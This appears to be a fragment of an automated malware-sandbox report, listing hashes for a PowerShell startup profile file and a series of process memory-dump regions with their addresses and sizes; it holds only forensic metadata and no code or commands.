                                                                                                                                                                      00cabcaf24bc86e72fae51fc7a32df0e245842959751035f22ba18d6baba93a42225a99786513c46d78182fddc1c3351cd746dda1c7cee4fb30ed35fe4300229

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      aa187cac09f051e24146ad549a0f08a6

                                                                                                                                                                      SHA1

                                                                                                                                                                      2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                                                                      SHA256

                                                                                                                                                                      7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                                                                      SHA512

                                                                                                                                                                      960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

• memory/64-123-0x00007FF8804D0000-0x00007FF8804E0000-memory.dmp
  Filesize: 64KB

• memory/64-116-0x00000226BD750000-0x00000226BD77B000-memory.dmp
  Filesize: 172KB

• memory/64-122-0x00000226BD750000-0x00000226BD77B000-memory.dmp
  Filesize: 172KB

• memory/384-127-0x0000027379940000-0x000002737996B000-memory.dmp
  Filesize: 172KB

• memory/464-71-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/464-75-0x00007FF8BF980000-0x00007FF8BFA3E000-memory.dmp
  Filesize: 760KB

• memory/464-70-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/464-78-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/464-68-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/464-69-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/464-73-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/464-74-0x00007FF8C0450000-0x00007FF8C0645000-memory.dmp
  Filesize: 2.0MB

• memory/612-90-0x00007FF8804D0000-0x00007FF8804E0000-memory.dmp
  Filesize: 64KB

• memory/612-82-0x000001F300030000-0x000001F30005B000-memory.dmp
  Filesize: 172KB

• memory/612-81-0x000001F300000000-0x000001F300025000-memory.dmp
  Filesize: 148KB

• memory/612-83-0x000001F300030000-0x000001F30005B000-memory.dmp
  Filesize: 172KB

• memory/612-89-0x000001F300030000-0x000001F30005B000-memory.dmp
  Filesize: 172KB

• memory/664-100-0x00000171C9D70000-0x00000171C9D9B000-memory.dmp
  Filesize: 172KB

• memory/664-94-0x00000171C9D70000-0x00000171C9D9B000-memory.dmp
  Filesize: 172KB

• memory/664-101-0x00007FF8804D0000-0x00007FF8804E0000-memory.dmp
  Filesize: 64KB

• memory/952-112-0x00007FF8804D0000-0x00007FF8804E0000-memory.dmp
  Filesize: 64KB

• memory/952-105-0x000002137FDA0000-0x000002137FDCB000-memory.dmp
  Filesize: 172KB

• memory/952-111-0x000002137FDA0000-0x000002137FDCB000-memory.dmp
  Filesize: 172KB

• memory/2640-67-0x00007FF8BF980000-0x00007FF8BFA3E000-memory.dmp
  Filesize: 760KB

• memory/2640-66-0x00007FF8C0450000-0x00007FF8C0645000-memory.dmp
  Filesize: 2.0MB

• memory/2640-65-0x000002A9A3410000-0x000002A9A343A000-memory.dmp
  Filesize: 168KB

• memory/3476-0-0x00007FF8A0B93000-0x00007FF8A0B95000-memory.dmp
  Filesize: 8KB

• memory/3476-15-0x00007FF8A0B90000-0x00007FF8A1651000-memory.dmp
  Filesize: 10.8MB

• memory/3476-12-0x00007FF8A0B90000-0x00007FF8A1651000-memory.dmp
  Filesize: 10.8MB

• memory/3476-11-0x00007FF8A0B90000-0x00007FF8A1651000-memory.dmp
  Filesize: 10.8MB

• memory/3476-10-0x000002147C940000-0x000002147C962000-memory.dmp
  Filesize: 136KB